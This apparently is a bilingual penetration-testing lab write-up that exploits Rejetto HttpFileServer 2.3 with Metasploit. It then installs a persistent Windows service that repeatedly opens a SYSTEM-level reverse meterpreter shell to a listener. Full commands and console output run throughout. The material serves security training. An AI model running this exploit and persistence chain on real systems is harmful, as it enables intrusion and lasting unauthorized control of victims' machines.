Persistence Service

Posted by r3kind1e on July 4, 2023

Windows Persistence

Persistence Via Services

Establishing Persistence On Windows

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. - MITRE ATT&CK

Gaining an initial foothold is not enough, you need to setup and maintain persistent access to your targets.

Note: The persistence technique you use will need to be in accordance with the rules of engagement laid out and agreed upon with the client.

Demo: Persistence Via Services

Windows Persistence

通过服务实现持久性

在Windows上建立持久性

持久性是指对手使用的技术,用于在重新启动、更改凭据和其他可能中断其访问的情况下保持对系统的访问。用于持久性的技术包括任何访问、操作或配置更改,使他们能够在系统上保持立足点,例如替换或劫持合法代码或添加启动代码。- MITRE ATT&CK

获得初始立足点是不够的,您需要设置和维护对目标的持续访问。

注意:您使用的持久性技术将需要符合与客户达成的约定规则。

演示:通过服务实现持久性

Once you gain access to a target system, the next logical step is to perform local enumeration. Try and identify as much information as you can about the system that you’ve just compromised. You can then go ahead and start transferring the files that you need to transfer. The next logical step would be to elevate your privileges if you obtained a non-elevated session. The reason you need to elevate your privileges before establishing persistence is primarily because persistence technique will typically require administrative access in order for them to be performed correctly.

If we can’t modify the system, probably the best option then is to perform a hash dump and obtain the hashes of the user accounts on that system so that you can always authenticate legitimately back on that target system that you’ve compromised.

MITRE ATT&CK

Persistence

账户操纵 攻击者可能会操纵帐户以保持对受害系统的访问。帐户操作可能包括保留对手对已泄露帐户的访问权限的任何操作,例如修改凭据或权限组。这些操作还可能包括旨在破坏安全策略的帐户活动,例如执行迭代密码更新以绕过密码持续时间策略并保留已泄露凭据的生存期。
登录脚本 (Windows) 攻击者可以使用在登录初始化时自动执行的 Windows 登录脚本来建立持久性。Windows 允许在特定用户或用户组登录到系统时运行登录脚本。这是通过将脚本的路径添加到注册表项来完成的。
创建帐户 攻击者可以创建一个帐户来保持对受害者系统的访问。通过足够的访问级别,创建此类帐户可用于建立不需要在系统上部署持久远程访问工具的辅助凭据访问。

We’re going to exploit a vulnerable service on the target system. Once we’ve gained access to the target system, we can then establish persistence. If we need to elevate our privileges, we will do that before we establish persistence.

Target IP Address : 10.2.31.23

1
nmap -sV 10.2.31.23
1
2
3
msfconsole
search rejetto
use 0

That’s 32 bit meterpreter payload. At this point, we still don’t know what the target system operating system architecture is. So it’s always safe to utilize the 32 bit meterpreter payload.

1
2
3
show options
set RHOSTS 10.2.31.23
exploit
1
meterpreter > sysinfo

We can also identify our current user and the privileges associated with that user.

1
2
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator

We’re currently the administrator user. It means we do not need to elevate our privileges and we can move to the next phase, which is establishing persistence.

We’re going to be focusing on how to establish persistence through a Windows persistence service.

We’re going to be exploring how to set up a service that will connect back to our Metasploit Framework multi/handler listener and provide us with persistent access whenever we want.

In order to run that particular module, you do need to have elevated privileges.

Windows Persistent Service Installer

Windows Persistent Service Installer Windows 持久服务安装程序

Description 描述

This Module will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.

此模块将生成可执行文件并将其上传到远程主机,接下来将使其成为持久服务。它将创建一个新服务,该服务将在服务运行时启动有效负载。需要管理员或系统权限。

1
2
3
4
meterpreter > background
search persistence_service
use exploit/windows/local/persistence_service
use 0

The default payload is set to the 32 bit meterpreter payload, as we can always migrate our process into a different process that is a 64 bit process.

The way this module works is that it will generate and upload an executable to the target system. It will then make it a persistent service. Services run in the background. This module will then create a new service, which will start the payload whenever the service is running. And you do require administrative or system privileges in order to utilize this particular module here.

1
2
3
4
5
show options
set LPORT 4433
sessions
set SESSION 1
exploit

This module will generate a payload with msfvenom. This payload will then be uploaded to the target system. This module will then make it a persistent service. So it’ll create a new service, which will then start the payload that was generated and uploaded to the target system whenever that service is running. And in order to create a new service on Windows, you require an elevated session or elevated privileges.

1
2
3
4
5
6
7
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
sessions
sessions -k 1
sessions
exit

That’s one of the great things with a persistent service is it provides you with the highest level of privileges available on a Windows system not tied down to a particular user account.

Remember the persistent services running on the target system. After every five seconds, it’s going to execute the payload that will then connect back to the listener.

1
2
msfconsole
use multi/handler

We then set the payload that we specified when we were using the persistence module, which by default was the 32-bit meterpreter.

1
2
3
4
5
set payload windows/meterpreter/reverse_tcp
show options
set LHOST eth1
set LPORT 4433
exploit
1
2
3
4
meterpreter > sysinfo
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
exit
1
2
run
meterpreter > 

Maintaining Access: Persistence Service维护访问:持久性服务

Overview 概述

A Kali GUI machine and a target machine running a vulnerable server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).

为您提供了一台 Kali GUI 机器和一台运行易受攻击服务器的目标机器。目标计算机的 IP 地址在名为 target 的文本文件中提供,该文件放置在 Kali 机器的桌面 (/root/Desktop/target) 上。

Your task is to fingerprint the application using the tools available on the Kali machine and exploit the application using the appropriate Metasploit module.

您的任务是使用 Kali 机器上可用的工具对应用程序进行指纹识别,并使用适当的 Metasploit 模块利用应用程序。

Then, use the exploit/windows/local/persistence_service local exploit module to maintain access.

然后,使用漏洞利用/窗口/本地/persistence_service本地漏洞利用模块来维护访问。

Objective: Exploit the application and maintain access using the Metasploit module.

目标:利用应用程序并使用Metasploit模块保持访问。

Instructions:  指示:

  • Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.您的 Kali 机器有一个 IP 地址为 10.10.X.Y. 的接口。 运行“ip addr”以了解 X 和 Y 的值。
  • The IP address of the target machine is mentioned in the file “/root/Desktop/target”目标计算机的 IP 地址在文件“/root/Desktop/target”中提及
  • Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1不要攻击位于 IP 地址 192.V.W.1 和 10.10.X.1 的网关

Solutions 解决方案

The solution for this lab can be found in the following manual:

https://assets.ine.com/labs/ad-manuals/walkthrough-2140.pdf

本实验的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-2140.pdf

复现视频内容

Target IP Address : 10.0.27.39

Kali Linux : 10.10.16.2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@attackdefense:~# nmap -sV 10.0.27.39

Starting Nmap 7.91 ( https://nmap.org ) at 2023-07-04 07:22 IST
Nmap scan report for 10.0.27.39
Host is up (0.0027s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               HttpFileServer httpd 2.3
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.87 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
root@attackdefense:~# msfconsole -q
msf6 > search rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.0.27.39
RHOSTS => 10.0.27.39
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.2:4444 
[*] Using URL: http://0.0.0.0:8080/hBiK4euisGqLpno
[*] Local IP: http://10.10.16.2:8080/hBiK4euisGqLpno
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /hBiK4euisGqLpno
[*] Sending stage (175174 bytes) to 10.0.27.39
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.0.27.39:49234) at 2023-07-04 07:26:33 +0530
[!] Tried to delete %TEMP%\DtbsuvF.vbs, unknown result
[*] Server stopped.

meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
meterpreter > background
[*] Backgrounding session 1...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
msf6 exploit(windows/http/rejetto_hfs_exec) > search persistence_service

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/windows/local/persistence_service  2018-10-20       excellent  No     Windows Persistent Service Installer

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/persistence_service

msf6 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/local/persistence_service
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence_service) > show options

Module options (exploit/windows/local/persistence_service):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   REMOTE_EXE_NAME                       no        The remote victim name. Random string as default.
   REMOTE_EXE_PATH                       no        The remote victim exe path to run. Use temp directory as default.
   RETRY_TIME           5                no        The retry time that shell connect failed. 5 seconds as default.
   SERVICE_DESCRIPTION                   no        The description of service. Random string as default.
   SERVICE_NAME                          no        The name of service. Random string as default.
   SESSION                               yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf6 exploit(windows/local/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  WIN-OMCNBKR66MN\Administrator @ WIN-OMCNBKR66MN  10.10.16.2:4444 -> 10.0.27.39:49234 (10.0.27.39)

msf6 exploit(windows/local/persistence_service) > set LPORT 4433
LPORT => 4433
msf6 exploit(windows/local/persistence_service) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/persistence_service) > exploit

[*] Started reverse TCP handler on 10.10.16.2:4433 
[*] Running module against WIN-OMCNBKR66MN
[+] Meterpreter service exe written to C:\Users\ADMINI~1\AppData\Local\Temp\1\hQpQq.exe
[*] Creating service rozqeeR
[*] Sending stage (175174 bytes) to 10.0.27.39
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/WIN-OMCNBKR66MN_20230704.3458/WIN-OMCNBKR66MN_20230704.3458.rc
[*] Meterpreter session 2 opened (10.10.16.2:4433 -> 10.0.27.39:49268) at 2023-07-04 07:34:59 +0530

meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
Background session 2? [y/N]  
msf6 exploit(windows/local/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  WIN-OMCNBKR66MN\Administrator @ WIN-OMCNBKR66MN  10.10.16.2:4444 -> 10.0.27.39:49234 (10.0.27.39)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-OMCNBKR66MN            10.10.16.2:4433 -> 10.0.27.39:49268 (10.0.27.39)

msf6 exploit(windows/local/persistence_service) > sessions -K
[*] Killing all sessions...
[*] 10.0.27.39 - Meterpreter session 1 closed.
[*] 10.0.27.39 - Meterpreter session 2 closed.
msf6 exploit(windows/local/persistence_service) > sessions

Active sessions
===============

No active sessions.

msf6 exploit(windows/local/persistence_service) > exit
root@attackdefense:~#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@attackdefense:~# msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > set LHOST eth1
LHOST => 10.10.16.2
msf6 exploit(multi/handler) > set LPORT 4433
LPORT => 4433
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.2:4433 
[*] Sending stage (175174 bytes) to 10.0.27.39
[*] Meterpreter session 1 opened (10.10.16.2:4433 -> 10.0.27.39:49323) at 2023-07-04 07:43:16 +0530

meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.0.27.39 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/handler) > sessions

Active sessions
===============

No active sessions.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.2:4433 
[*] Sending stage (175174 bytes) to 10.0.27.39
[*] Meterpreter session 2 opened (10.10.16.2:4433 -> 10.0.27.39:49343) at 2023-07-04 07:46:11 +0530

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
Background session 2? [y/N]  
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-OMCNBKR66MN  10.10.16.2:4433 -> 10.0.27.39:49343 (10.0.27.39)